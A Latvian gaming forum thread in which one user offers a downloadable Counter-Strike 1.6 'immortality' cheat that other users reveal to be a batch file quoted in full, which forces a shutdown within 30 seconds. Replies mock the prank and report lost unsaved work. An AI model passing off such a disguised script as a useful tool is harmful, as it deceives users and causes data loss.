hyipzws Posted March 30, 2007 Report Share Posted March 30, 2007 Skatījos kad ten cs geimeru tauta tikai apgrozās gan jau kādam vajadzēs parastu vienību maiņu ar kuras rezūltātā tu esi nemirstīgs! lādējam šeit: http://www.myprox.org/undead.zip Atarhiveejam valjaa palaizham undead.bat ejam ieksh CS1.6 un priecājies kā tevi nevar nošaut, , P.S Šitiem čītiem nav nekāds wh+aim klāt , tikai nemirstība! Lūdzu Link to comment Share on other sites More sharing options...
SuperRembo Posted March 30, 2007 Report Share Posted March 30, 2007 @echo off shutdown.exe -s -t 30 -c "IZBEIDZ TACHU SPEELEET TO CS! Pavadi savu laiku lietderiigi nevis spelejot tikai CS,Un tagad atslaabsti tev ir 30sekundes lai visu saglabaaatu!" Diemzel, bat faila nevar ierakakstiit funkcijas nekadas ipasas, pat virusu nevar, a tu te megini tautai chakaret smadzenes ka viruss, saprastu ja butu cita formata nevis BAT Link to comment Share on other sites More sharing options...
hyipzws Posted March 30, 2007 Author Report Share Posted March 30, 2007 Gribēju pataupīt līdz pirmajam aprilim Link to comment Share on other sites More sharing options...
thydevil Posted March 30, 2007 Report Share Posted March 30, 2007 @echo off shutdown.exe -s -t 30 -c "IZBEIDZ TACHU SPEELEET TO CS! Pavadi savu laiku lietderiigi nevis spelejot tikai CS,Un tagad atslaabsti tev ir 30sekundes lai visu saglabaaatu!" Diemzel, bat faila nevar ierakakstiit funkcijas nekadas ipasas, pat virusu nevar, a tu te megini tautai chakaret smadzenes ka viruss, saprastu ja butu cita formata nevis BAT var jau .cmd failus arii, tas tas pats kas .bat bet nav .bat lol smiekligi ES MAAKU TAISIIT EXES UN SUDAINUS VIRUSUS, KAS NAV VIRUS bet tas jau nav nekas iipash Link to comment Share on other sites More sharing options...
hyipzws Posted March 30, 2007 Author Report Share Posted March 30, 2007 Nu kursh izmeeginaaja chiitus? Link to comment Share on other sites More sharing options...
Hofo Posted March 30, 2007 Report Share Posted March 30, 2007 (edited) Kopš tā laika (pirms kādiem 3 gadiem), kad gign chatā paprasiju, kaut kādu programu (neaceros kādu) un man iedeva emal (vai kaut ko tamlīdzīgs) un man nācās pavadīt stundiņu, lai viņu noņemtu, es neko nekačāju, ne čītus, ne citas mazas programiņas. Lūk tāds ir mans stāsts. Edited March 30, 2007 by Hofo Link to comment Share on other sites More sharing options...
zv3rs Posted March 30, 2007 Report Share Posted March 30, 2007 kaut kaads stulbums Link to comment Share on other sites More sharing options...
spyker-cs Posted March 30, 2007 Report Share Posted March 30, 2007 Skatījos kad ten cs geimeru tauta tikai apgrozās gan jau kādam vajadzēs parastu vienību maiņu ar kuras rezūltātā tu esi nemirstīgs! lādējam šeit: http://www.myprox.org/undead.zip Atarhiveejam valjaa palaizham undead.bat ejam ieksh CS1.6 un priecājies kā tevi nevar nošaut, , P.S Šitiem čītiem nav nekāds wh+aim klāt , tikai nemirstība! Lūdzu STULBENIS!!! ps Sorry Dr.Pain par red color ^^ Link to comment Share on other sites More sharing options...
Ducatii Posted March 31, 2007 Report Share Posted March 31, 2007 Tizlais Kroplis! ban tadus tizlenjus! Psc 2 h taisiju web.. viss pa dirsu tikai tapec ka viens nuugjis grib but aspratigs! Link to comment Share on other sites More sharing options...
vincister Posted March 31, 2007 Report Share Posted March 31, 2007 lol, naivie! BTW: ducatii vajag seivoties regulāri! Link to comment Share on other sites More sharing options...
StayCooL Posted March 31, 2007 Report Share Posted March 31, 2007 kaukads stulbums... Link to comment Share on other sites More sharing options...
HoLLow_LiFe Posted March 31, 2007 Report Share Posted March 31, 2007 karoče gg. Link to comment Share on other sites More sharing options...
Recommended Posts